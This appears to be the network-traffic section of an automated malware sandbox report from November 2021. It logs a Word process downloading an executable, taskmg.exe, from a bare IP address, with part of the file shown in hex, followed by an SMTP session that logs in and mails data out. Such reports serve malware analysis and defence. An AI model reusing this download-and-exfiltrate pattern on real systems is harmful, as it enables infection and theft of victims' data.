                                                                                                              Nov 25, 2021 18:14:54.420553923 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.420604944 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.420605898 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.420655966 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.421164989 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.421199083 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.421217918 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.421243906 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.421272993 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.421317101 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.421327114 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.421365976 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565242052 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565324068 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565355062 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565396070 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565434933 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565474033 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565510035 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565547943 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565603018 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565661907 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565673113 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565677881 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565682888 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565865040 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565903902 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565941095 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565962076 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565979958 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565994978 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566003084 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566019058 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566049099 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566057920 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566076994 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566097975 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566119909 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566137075 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566169977 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566195965 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566200972 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566271067 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566291094 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566358089 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566409111 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566447973 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566482067 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566500902 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566755056 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566790104 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566828966 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566854000 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.567548990 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.567626953 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.567666054 CET8049165173.232.204.89192.168.2.22

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 25, 2021 18:15:49.490634918 CET5216753192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:15:49.520104885 CET53521678.8.8.8192.168.2.22
                                                                                                              Nov 25, 2021 18:15:59.805334091 CET5059153192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:15:59.833695889 CET53505918.8.8.8192.168.2.22
                                                                                                              Nov 25, 2021 18:16:12.298753977 CET5780553192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:16:12.361740112 CET53578058.8.8.8192.168.2.22
                                                                                                              Nov 25, 2021 18:16:12.362324953 CET5780553192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:16:12.399799109 CET53578058.8.8.8192.168.2.22
                                                                                                              Nov 25, 2021 18:16:21.448317051 CET5903053192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:16:21.492975950 CET53590308.8.8.8192.168.2.22
                                                                                                              Nov 25, 2021 18:16:46.932264090 CET5918553192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:16:46.969466925 CET53591858.8.8.8192.168.2.22
                                                                                                              Nov 25, 2021 18:16:55.348798037 CET5561653192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:16:55.386456013 CET53556168.8.8.8192.168.2.22
                                                                                                              Nov 25, 2021 18:16:56.537000895 CET4997253192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:16:56.558192968 CET53499728.8.8.8192.168.2.22
                                                                                                              Nov 25, 2021 18:16:56.558620930 CET4997253192.168.2.228.8.8.8
                                                                                                              Nov 25, 2021 18:16:56.586457014 CET53499728.8.8.8192.168.2.22

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                              Nov 25, 2021 18:15:49.490634918 CET192.168.2.228.8.8.80x8b24Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:15:59.805334091 CET192.168.2.228.8.8.80x9c20Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.298753977 CET192.168.2.228.8.8.80xf1c3Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.362324953 CET192.168.2.228.8.8.80xf1c3Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:21.448317051 CET192.168.2.228.8.8.80x3d18Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:46.932264090 CET192.168.2.228.8.8.80x11d7Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:55.348798037 CET192.168.2.228.8.8.80x4b18Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.537000895 CET192.168.2.228.8.8.80xb7b1Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.558620930 CET192.168.2.228.8.8.80xb7b1Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                              Nov 25, 2021 18:15:49.520104885 CET8.8.8.8192.168.2.220x8b24No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:15:49.520104885 CET8.8.8.8192.168.2.220x8b24No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:15:49.520104885 CET8.8.8.8192.168.2.220x8b24No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:15:49.520104885 CET8.8.8.8192.168.2.220x8b24No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:15:59.833695889 CET8.8.8.8192.168.2.220x9c20No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:15:59.833695889 CET8.8.8.8192.168.2.220x9c20No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:15:59.833695889 CET8.8.8.8192.168.2.220x9c20No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:15:59.833695889 CET8.8.8.8192.168.2.220x9c20No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.361740112 CET8.8.8.8192.168.2.220xf1c3No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.361740112 CET8.8.8.8192.168.2.220xf1c3No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.361740112 CET8.8.8.8192.168.2.220xf1c3No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.361740112 CET8.8.8.8192.168.2.220xf1c3No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.399799109 CET8.8.8.8192.168.2.220xf1c3No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.399799109 CET8.8.8.8192.168.2.220xf1c3No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.399799109 CET8.8.8.8192.168.2.220xf1c3No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:12.399799109 CET8.8.8.8192.168.2.220xf1c3No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:21.492975950 CET8.8.8.8192.168.2.220x3d18No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:21.492975950 CET8.8.8.8192.168.2.220x3d18No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:21.492975950 CET8.8.8.8192.168.2.220x3d18No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:21.492975950 CET8.8.8.8192.168.2.220x3d18No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:46.969466925 CET8.8.8.8192.168.2.220x11d7No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:46.969466925 CET8.8.8.8192.168.2.220x11d7No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:46.969466925 CET8.8.8.8192.168.2.220x11d7No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:46.969466925 CET8.8.8.8192.168.2.220x11d7No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:55.386456013 CET8.8.8.8192.168.2.220x4b18No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:55.386456013 CET8.8.8.8192.168.2.220x4b18No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:55.386456013 CET8.8.8.8192.168.2.220x4b18No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:55.386456013 CET8.8.8.8192.168.2.220x4b18No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.558192968 CET8.8.8.8192.168.2.220xb7b1No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.558192968 CET8.8.8.8192.168.2.220xb7b1No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.558192968 CET8.8.8.8192.168.2.220xb7b1No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.558192968 CET8.8.8.8192.168.2.220xb7b1No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.586457014 CET8.8.8.8192.168.2.220xb7b1No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.586457014 CET8.8.8.8192.168.2.220xb7b1No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.586457014 CET8.8.8.8192.168.2.220xb7b1No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                              Nov 25, 2021 18:16:56.586457014 CET8.8.8.8192.168.2.220xb7b1No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • 173.232.204.89

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.2.2249165173.232.204.8980C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 25, 2021 18:14:53.977502108 CET0OUTGET /taskmg.exe HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              UA-CPU: AMD64
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                              Host: 173.232.204.89
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 25, 2021 18:14:54.124871969 CET1INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.19.9
                                                                                                              Date: Thu, 25 Nov 2021 17:14:54 GMT
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Content-Length: 777216
                                                                                                              Last-Modified: Thu, 25 Nov 2021 03:51:30 GMT
                                                                                                              Connection: keep-alive
                                                                                                              ETag: "619f0842-bdc00"
                                                                                                              Accept-Ranges: bytes
                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 42 08 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 0b 00 00 0a 00 00 00 00 00 00 ae ee 0b 00 00 20 00 00 00 00 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c ee 0b 00 4f 00 00 00 00 00 0c 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c cf 0b 00 00 20 00 00 00 d0 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 88 06 00 00 00 00 0c 00 00 08 00 00 00 d2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0c 00 00 02 00 00 00 da 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 ee 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 a0 21 01 00 03 00 00 00 8c 01 00 06 4c 6a 02 00 10 84 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 30 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 1b 30 03 00 f9 00 00 00 03 00 00 11 02 7b 03 00 00 04 6f 23 00 00 0a 28 31 00 00 0a 02 7b 03 00 00 04 6f 23 00 00 0a 28 32 00 00 0a 0a 06 72 01 00 00 70 28 33 00 00 0a 28 34 00 00 0a 16 73 35 00 00 0a 0b 02 7b 02 00 00 04 6f 28 00 00 0a 0c 38 89 00 00 00 12 02 28 29 00 00 0a
                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELBa0 @ @@\O H.text `.rsrc@@.reloc @BHH!Ljs}s }(!({o"*0(}-}+T{o#o$,{o#o%}+(s&}{o#{o'({,6{o(+()((*-o*{o+{o,o-}*0){(.t|(+3*0){(0t|(+3*0{o#(1{o#(2rp(3(4s5{o(8()


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              1192.168.2.2249166173.232.204.8980C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 25, 2021 18:14:59.854968071 CET821OUTGET /taskmg.exe HTTP/1.1
                                                                                                              Host: 173.232.204.89
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 25, 2021 18:15:00.005897045 CET822INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.19.9
                                                                                                              Date: Thu, 25 Nov 2021 17:14:59 GMT
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Content-Length: 777216
                                                                                                              Last-Modified: Thu, 25 Nov 2021 03:51:30 GMT
                                                                                                              Connection: keep-alive
                                                                                                              ETag: "619f0842-bdc00"
                                                                                                              Accept-Ranges: bytes
                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 42 08 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 0b 00 00 0a 00 00 00 00 00 00 ae ee 0b 00 00 20 00 00 00 00 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c ee 0b 00 4f 00 00 00 00 00 0c 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c cf 0b 00 00 20 00 00 00 d0 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 88 06 00 00 00 00 0c 00 00 08 00 00 00 d2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0c 00 00 02 00 00 00 da 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 ee 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 a0 21 01 00 03 00 00 00 8c 01 00 06 4c 6a 02 00 10 84 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 30 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 1b 30 03 00 f9 00 00 00 03 00 00 11 02 7b 03 00 00 04 6f 23 00 00 0a 28 31 00 00 0a 02 7b 03 00 00 04 6f 23 00 00 0a 28 32 00 00 0a 0a 06 72 01 00 00 70 28 33 00 00 0a 28 34 00 00 0a 16 73 35 00 00 0a 0b 02 7b 02 00 00 04 6f 28 00 00 0a 0c 38 89 00 00 00 12 02 28 29 00 00 0a
                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELBa0 @ @@\O H.text `.rsrc@@.reloc @BHH!Ljs}s }(!({o"*0(}-}+T{o#o$,{o#o%}+(s&}{o#{o'({,6{o(+()((*-o*{o+{o,o-}*0){(.t|(+3*0){(0t|(+3*0{o#(1{o#(2rp(3(4s5{o(8()


                                                                                                              SMTP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                              Nov 25, 2021 18:15:49.911569118 CET58749167208.91.199.224192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                              Nov 25, 2021 18:15:49.912316084 CET49167587192.168.2.22208.91.199.224EHLO 141700
                                                                                                              Nov 25, 2021 18:15:50.060368061 CET58749167208.91.199.224192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 41648128
                                                                                                              250-VRFY
                                                                                                              250-ETRN
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                              250-AUTH=PLAIN LOGIN
                                                                                                              250-ENHANCEDSTATUSCODES
                                                                                                              250-8BITMIME
                                                                                                              250 DSN
                                                                                                              Nov 25, 2021 18:15:50.062571049 CET49167587192.168.2.22208.91.199.224AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
                                                                                                              Nov 25, 2021 18:15:50.211478949 CET58749167208.91.199.224192.168.2.22334 UGFzc3dvcmQ6
                                                                                                              Nov 25, 2021 18:15:50.364773989 CET58749167208.91.199.224192.168.2.22235 2.7.0 Authentication successful
                                                                                                              Nov 25, 2021 18:15:50.365942955 CET49167587192.168.2.22208.91.199.224MAIL FROM:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:15:50.514678001 CET58749167208.91.199.224192.168.2.22250 2.1.0 Ok
                                                                                                              Nov 25, 2021 18:15:50.515450954 CET49167587192.168.2.22208.91.199.224RCPT TO:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:15:50.675885916 CET58749167208.91.199.224192.168.2.22250 2.1.5 Ok
                                                                                                              Nov 25, 2021 18:15:50.676439047 CET49167587192.168.2.22208.91.199.224DATA
                                                                                                              Nov 25, 2021 18:15:50.825654030 CET58749167208.91.199.224192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                              Nov 25, 2021 18:15:51.866069078 CET58749167208.91.199.224192.168.2.22250 2.0.0 Ok: queued as 92DD13A1A86
                                                                                                              Nov 25, 2021 18:16:00.303539991 CET58749168208.91.199.225192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                              Nov 25, 2021 18:16:00.303939104 CET49168587192.168.2.22208.91.199.225EHLO 141700
